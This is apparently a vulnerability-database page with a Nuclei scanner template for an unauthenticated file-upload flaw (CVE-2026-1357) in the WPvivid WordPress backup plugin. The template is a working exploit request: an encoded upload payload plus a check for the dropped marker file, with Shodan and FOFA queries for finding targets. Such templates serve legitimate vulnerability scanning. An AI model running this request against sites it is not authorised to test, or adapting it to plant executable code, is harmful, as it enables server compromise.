WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload

CVE-2026-1357
Verified

Description

The WPvivid Backup & Migration plugin for WordPress, versions <= 0.9.123, contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and a lack of path sanitization. Unauthenticated attackers can upload arbitrary PHP files and achieve remote code execution via the wpvivid_action=send_to_site parameter.

Severity

Critical

CVSS Score

9.8

Exploit Probability

10%

Affected Product

wpvivid-backuprestore

Published Date

February 13, 2026

Template Author

omarkurt

CVE-2026-1357.yaml
id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload
  author: omarkurt
  severity: critical
  description: |
    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.
  remediation: |
    Update to the latest version of WPvivid Backup & Migration plugin.
  reference:
    - https://vulnerabletarget.com/VT-2026-1357
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    epss-score: 0.10218
    epss-percentile: 0.93241
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"success"'
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-1357-nuclei-verification-test"

      - type: status
        status:
          - 200
# digest: 490a00463044022061872b14bc555cfc60780c0efb552b08bd398443e775ff67536c047b171df5b6022060a7f58e8817eebf5b611d737d8962faab5fc7e664f070921185cec9db731666:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2026-1357
CWE ID: CWE-434

References

https://vulnerabletarget.com/VT-2026-1357
https://github.com/LucasM0ntes/POC-CVE-2026-1357
https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
https://nvd.nist.gov/vuln/detail/CVE-2026-1357

Remediation Steps

Update to the latest version of WPvivid Backup & Migration plugin.